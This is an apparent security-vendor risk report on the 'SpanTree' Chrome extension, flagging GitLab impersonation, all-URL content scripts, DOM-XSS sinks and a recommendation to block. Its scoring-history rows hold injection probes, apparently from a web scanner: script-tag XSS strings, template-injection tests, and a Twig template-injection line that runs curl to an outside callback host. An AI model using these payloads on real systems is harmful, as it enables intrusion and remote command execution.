Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

SpanTree

gcjikeldobhnaglcoaejmdlmbienoocg
Risk Score
7.37
Risk Level: High
Recommendation: 🚫 BLOCK
Category DeveloperTools
Installs 5,000
Rating 4.3
Last updated 2024-05-03 (27 months ago)
Manifest version MV3
CSP present ❌ no
Developer tavy.andy97@gmail.com
Verified publisher ❌ no
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • GitLab brand impersonation by free-webmail Gmail developer with no verified identity.
  • Google generic privacy policy — scope_extension=false, data_collection=true, third_party_sharing=true: policy admits broad sharing unrelated to this extension.
  • Content script on <all_urls> with innerHTML DOM-XSS sinks and new Function() constructors; no CSP.
  • Extension stale 25 months; triple-stale fingerprint (>24mo + MV3 but no CSP + functional code risks).
  • bit.ly affiliate/cloaking hit in external JS hosts; 3 geo-diverse host countries (IN, SG, US).

Evidence

  • brand_impersonation store brand_mention.is_impersonation=true for 'gitlab'; developer is gmail user tavy.andy97, not confirmed GitLab owner.
  • generic_privacy_policy api Policy is Google's own account policy; scope_extension=false, data_collection=true, third_party_sharing=true => +10.0 privacy.
  • dom_xss_and_function_constructor crx innerHTML sinks in content.js & popup.js; new Function() in event.js & popup.js; no CSP => code_quality elevated.
  • stale_extension store Last updated May 2024, 25 months ago => maintenance +8.5; triple-stale Webstore +2.0.
  • affiliate_hit_bitly crx bit.ly in js_external_hosts; affiliate_hits confirms generic short-link/cloaking redirector.
  • broad_host_permissions manifest host_permissions=[<all_urls>] + content_scripts_matches=[<all_urls>] — full site read/write on every URL.
  • free_webmail_developer store Developer email tavy.andy97@gmail.com; no business domain; developer_domain_info=null.
  • tail_attack_surface api install_perm_anomaly.tail_attack_surface=true; 5000 installs + high-tier permissions = supply-chain risk.

Permissions Breakdown

  • <all_urls> (host_permissions) high Grants content script access to every URL the user visits — full page read/write.
  • <all_urls> (content_scripts_matches) high Content script injected on all URLs; combined with innerHTML sinks raises XSS risk.

Pillar Scores

Permissions7.00
Reputation7.50
Network4.50
Webstore6.50
Maintenance8.50
Privacy10.00
Code Quality6.00
CVE Exposure0.00

Scoring History

<fsssiedx{ xx psssiedx 7.05 High block 2026-08-19
xx pfsssiedxn sssiedx 7.29 High block 2026-08-19
'fsssiedxn$'sssiedx 6.65 High review 2026-08-19
&#x22;fsssiedxnfdsaxax><!--></ScRiPt>asddsssiedx 7.24 High block 2026-08-19
fsssiedxn<sssiedx 6.90 High review 2026-08-19
xx pfsssiedxa$"sssiedx 6.76 High block 2026-08-15
&#x22;fsssiedxa&#x27;sssiedx 7.08 High block 2026-08-15
fsssiedxa$"sssiedx 7.09 High review 2026-08-15
<fsssiedxi$"sssiedx 6.79 High block 2026-08-13
<fsssiedxa sssiedx 6.78 High block 2026-08-13
<fsssiedxa'sssiedx 7.02 High block 2026-08-13
<fsssiedxa&#x22;sssiedx 6.90 High review 2026-08-13
fsssiedx<sssiedx 6.73 High review 2026-08-13
v3.6&n992100=v992109 6.85 High review 2026-08-05
<fsssiedxa 6.77 High block 2026-08-04
<fsssiedxa$"sssiedx 6.82 High review 2026-08-04
<fsssiedxa xx psssiedx 6.99 High review 2026-08-04
fsssiedxa<sssiedx 6.98 High block 2026-08-04
sssieddrubricxsx 7.12 High review 2026-07-31
v3.69408"();}]9356 7.17 High block 2026-07-29
dfb__${98991*97996}__::.x 6.93 High block 2026-07-29
dfb{{98991*97996}}xca 6.65 High review 2026-07-29
bfgx10612%C0%BEz1%C0%BCz2a%90bcxhjl10612 6.68 High review 2026-07-29
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> 6.64 High review 2026-07-29
bfgx4680%C0%BEz1%C0%BCz2a%90bcxhjl4680 6.72 High block 2026-07-29
v3.6'"()&%<zzz><ScRiPt >necQ(9242)</ScRiPt> 7.15 High review 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitmlpmpcfdvo90753.bxss.me")}} 6.97 High block 2026-07-29
v3.6 7.37 High block 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:35
Listing SHA c9c8908d3068…
Force block — not fired
Score recovered no
Elapsed 27.3s